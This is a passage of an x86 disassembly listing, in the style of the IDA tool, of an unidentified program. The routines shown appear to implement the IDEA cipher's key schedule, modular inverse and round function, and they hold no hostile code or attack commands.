mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D20BF
; ---------------------------------------------------------------------------
loc_4D20E7: ; CODE XREF: sub_4D1CC4+402�j
; sub_4D1CC4+40D�j ...
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+var_3C]
push [ebp+arg_C]
call sub_4CC770
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+arg_10]
and byte ptr [eax-1], 0
mov edi, [ebp+arg_C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_44], ecx
jmp short loc_4D2189
; ---------------------------------------------------------------------------
loc_4D211C: ; CODE XREF: sub_4D1CC4+3EB�j
; sub_4D1CC4+3F3�j ...
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D2144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D2144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D2144
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D211C
; ---------------------------------------------------------------------------
loc_4D2144: ; CODE XREF: sub_4D1CC4+45F�j
; sub_4D1CC4+46A�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_4D1DB9
; ---------------------------------------------------------------------------
loc_4D214F: ; CODE XREF: sub_4D1CC4:loc_4D209C�j
jmp short loc_4D2184
; ---------------------------------------------------------------------------
loc_4D2151: ; CODE XREF: sub_4D1CC4+23B�j
; sub_4D1CC4+4B3�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D2179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D2179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D2179
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D2151
; ---------------------------------------------------------------------------
loc_4D2179: ; CODE XREF: sub_4D1CC4+494�j
; sub_4D1CC4+49F�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_4D1DB9
; ---------------------------------------------------------------------------
loc_4D2184: ; CODE XREF: sub_4D1CC4+14D�j
; sub_4D1CC4:loc_4D1EBA�j ...
jmp loc_4D1DA6
; ---------------------------------------------------------------------------
loc_4D2189: ; CODE XREF: sub_4D1CC4+EF�j
; sub_4D1CC4+12F�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4D2194
jmp short loc_4D21B6
sub_4D1CC4 endp
; =============== S U B R O U T I N E =======================================
sub_4D2194 proc near ; CODE XREF: sub_4D1CC4+4C9�p
; DATA XREF: _5:004DE400�o
mov eax, [ebp-34h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4D83DD
pop ecx
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jz short locret_4D21B5
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-2Ch]
call sub_4D0741
locret_4D21B5: ; CODE XREF: sub_4D2194+13�j
retn
sub_4D2194 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D1CC4
loc_4D21B6: ; CODE XREF: sub_4D1CC4+4CE�j
mov eax, [ebp+var_44]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4D1CC4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
push dword ptr [ebp-4]
push dword ptr [ebp+8]
mov ecx, [ebp-4]
call sub_4D21F3
mov eax, [ebp-4]
add eax, 68h
push eax
push dword ptr [ebp-4]
mov ecx, [ebp-4]
call sub_4D229B
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D21F3 proc near ; CODE XREF: _4:004D21D8�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
and [ebp+var_8], 0
jmp short loc_4D2209
; ---------------------------------------------------------------------------
loc_4D2202: ; CODE XREF: sub_4D21F3+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D2209: ; CODE XREF: sub_4D21F3+D�j
cmp [ebp+var_8], 8
jge short loc_4D2235
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
shl eax, 8
mov ecx, [ebp+arg_0]
movzx ecx, byte ptr [ecx+1]
add eax, ecx
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*2], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
jmp short loc_4D2202
; ---------------------------------------------------------------------------
loc_4D2235: ; CODE XREF: sub_4D21F3+1A�j
and [ebp+var_4], 0
jmp short loc_4D2242
; ---------------------------------------------------------------------------
loc_4D223B: ; CODE XREF: sub_4D21F3+A2�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4D2242: ; CODE XREF: sub_4D21F3+46�j
cmp [ebp+var_8], 34h
jge short locret_4D2297
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
shl eax, 9
mov ecx, [ebp+var_4]
inc ecx
and ecx, 7
mov edx, [ebp+arg_4]
movzx ecx, word ptr [edx+ecx*2]
sar ecx, 7
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [edx+ecx*2+0Eh], ax
mov eax, [ebp+var_4]
and eax, 8
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2]
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov [ebp+var_4], eax
jmp short loc_4D223B
; ---------------------------------------------------------------------------
locret_4D2297: ; CODE XREF: sub_4D21F3+53�j
leave
retn 8
sub_4D21F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D229B proc near ; CODE XREF: _4:004D21EA�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = word ptr -7Ch
var_78 = dword ptr -78h
var_74 = word ptr -74h
var_70 = word ptr -70h
var_6C = word ptr -6Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push esi
push edi
mov [ebp+var_80], ecx
lea eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_84], ax
push [ebp+var_84]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_88], ax
push [ebp+var_88]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
and [ebp+var_78], 0
jmp short loc_4D2372
; ---------------------------------------------------------------------------
loc_4D236B: ; CODE XREF: sub_4D229B+1D7�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_4D2372: ; CODE XREF: sub_4D229B+CE�j
cmp [ebp+var_78], 7
jge loc_4D2477
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_8C], ax
push [ebp+var_8C]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_90], ax
push [ebp+var_90]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
jmp loc_4D236B
; ---------------------------------------------------------------------------
loc_4D2477: ; CODE XREF: sub_4D229B+DB�j
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_94], ax
push [ebp+var_94]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_98], ax
push [ebp+var_98]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_4D259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
push 1Ah
pop ecx
lea esi, [ebp+var_6C]
mov edi, [ebp+arg_4]
rep movsd
and [ebp+var_78], 0
jmp short loc_4D2585
; ---------------------------------------------------------------------------
loc_4D257E: ; CODE XREF: sub_4D229B+2F9�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_4D2585: ; CODE XREF: sub_4D229B+2E1�j
cmp [ebp+var_78], 34h
jge short loc_4D2596
mov eax, [ebp+var_78]
and [ebp+eax*2+var_6C], 0
jmp short loc_4D257E
; ---------------------------------------------------------------------------
loc_4D2596: ; CODE XREF: sub_4D229B+2EE�j
pop edi
pop esi
leave
retn 8
sub_4D229B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D259C proc near ; CODE XREF: sub_4D229B+32�p
; sub_4D229B+81�p ...
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
movzx eax, [ebp+arg_0]
cmp eax, 1
jg short loc_4D25B7
mov ax, [ebp+arg_0]
jmp locret_4D268F
; ---------------------------------------------------------------------------
loc_4D25B7: ; CODE XREF: sub_4D259C+10�j
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_C], ax
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4D25F7
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
jmp locret_4D268F
; ---------------------------------------------------------------------------
loc_4D25F7: ; CODE XREF: sub_4D259C+42�j
mov [ebp+var_8], 1
loc_4D25FD: ; CODE XREF: sub_4D259C+DF�j
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+arg_0], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_C]
imul eax, ecx
mov cx, [ebp+var_8]
add cx, ax
mov [ebp+var_8], cx
movzx eax, [ebp+arg_0]
cmp eax, 1
jnz short loc_4D2640
mov ax, [ebp+var_8]
jmp short locret_4D268F
; ---------------------------------------------------------------------------
loc_4D2640: ; CODE XREF: sub_4D259C+9C�j
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_8]
imul eax, ecx
mov cx, [ebp+var_C]
add cx, ax
mov [ebp+var_C], cx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_4D25FD
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
locret_4D268F: ; CODE XREF: sub_4D259C+16�j
; sub_4D259C+56�j ...
leave
retn 4
sub_4D259C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_4D26AF
; ---------------------------------------------------------------------------
loc_4D26A8: ; CODE XREF: _4:004D26D1�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_4D26AF: ; CODE XREF: _4:004D26A6�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_4D26D3
push dword ptr [ebp-0Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4D26D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_4D26A8
; ---------------------------------------------------------------------------
locret_4D26D3: ; CODE XREF: _4:004D26B5�j
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D26D7 proc near ; CODE XREF: _4:004D26C3�p _4:004D2D36�p
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_28 = word ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = word ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 48h
push ebx
mov [ebp+var_30], ecx
mov [ebp+var_4], 8
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_1C], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_20], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_28], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_2C], ax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov [ebp+var_1C], ax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov [ebp+var_20], ax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov [ebp+var_28], ax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov [ebp+var_2C], ax
loc_4D277E: ; CODE XREF: sub_4D26D7+41E�j
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D281D
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_4D27FE
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
jmp short loc_4D2813
; ---------------------------------------------------------------------------
loc_4D27FE: ; CODE XREF: sub_4D26D7+D8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
loc_4D2813: ; CODE XREF: sub_4D26D7+125�j
mov ax, [ebp+var_32]
mov [ebp+var_34], ax
jmp short loc_4D2832
; ---------------------------------------------------------------------------
loc_4D281D: ; CODE XREF: sub_4D26D7+BF�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_34], ax
loc_4D2832: ; CODE XREF: sub_4D26D7+144�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D28FD
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_4D28DE
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
jmp short loc_4D28F3
; ---------------------------------------------------------------------------
loc_4D28DE: ; CODE XREF: sub_4D26D7+1B8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
loc_4D28F3: ; CODE XREF: sub_4D26D7+205�j
mov ax, [ebp+var_36]
mov [ebp+var_38], ax
jmp short loc_4D2912
; ---------------------------------------------------------------------------
loc_4D28FD: ; CODE XREF: sub_4D26D7+19F�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_38], ax
loc_4D2912: ; CODE XREF: sub_4D26D7+224�j
mov ax, [ebp+var_28]
mov [ebp+var_14], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_1C]
mov [ebp+var_28], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D29C5
movzx eax, [ebp+var_28]
and eax, 0FFFFh
mov [ebp+var_28], ax
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_4D29A6
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_28], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_28]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_28], ax
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
jmp short loc_4D29BB
; ---------------------------------------------------------------------------
loc_4D29A6: ; CODE XREF: sub_4D26D7+280�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
loc_4D29BB: ; CODE XREF: sub_4D26D7+2CD�j
mov ax, [ebp+var_3A]
mov [ebp+var_3C], ax
jmp short loc_4D29DA
; ---------------------------------------------------------------------------
loc_4D29C5: ; CODE XREF: sub_4D26D7+267�j
movzx eax, [ebp+var_28]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3C], ax
loc_4D29DA: ; CODE XREF: sub_4D26D7+2EC�j
mov ax, [ebp+var_20]
mov [ebp+var_C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_2C]
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
add ax, [ebp+var_28]
mov [ebp+var_20], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D2A99
movzx eax, [ebp+var_20]
and eax, 0FFFFh
mov [ebp+var_20], ax
movzx eax, [ebp+var_20]
test eax, eax
jz short loc_4D2A7A
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_20], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_20]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
jmp short loc_4D2A8F
; ---------------------------------------------------------------------------
loc_4D2A7A: ; CODE XREF: sub_4D26D7+354�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
loc_4D2A8F: ; CODE XREF: sub_4D26D7+3A1�j
mov ax, [ebp+var_3E]
mov [ebp+var_40], ax
jmp short loc_4D2AAE
; ---------------------------------------------------------------------------
loc_4D2A99: ; CODE XREF: sub_4D26D7+33B�j
movzx eax, [ebp+var_20]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_40], ax
loc_4D2AAE: ; CODE XREF: sub_4D26D7+3C0�j
mov ax, [ebp+var_28]
add ax, [ebp+var_20]
mov [ebp+var_28], ax
mov ax, [ebp+var_1C]
xor ax, [ebp+var_20]
mov [ebp+var_1C], ax
mov ax, [ebp+var_2C]
xor ax, [ebp+var_28]
mov [ebp+var_2C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_14]
mov [ebp+var_20], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_C]
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz loc_4D277E
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_4D2B9A
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_4D2B7B
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
jmp short loc_4D2B90
; ---------------------------------------------------------------------------
loc_4D2B7B: ; CODE XREF: sub_4D26D7+455�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
loc_4D2B90: ; CODE XREF: sub_4D26D7+4A2�j
mov ax, [ebp+var_42]
mov [ebp+var_44], ax
jmp short loc_4D2BAF
; ---------------------------------------------------------------------------
loc_4D2B9A: ; CODE XREF: sub_4D26D7+43C�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_44], ax
loc_4D2BAF: ; CODE XREF: sub_4D26D7+4C1�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
test eax, eax
jz loc_4D2C72
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_4D2C53
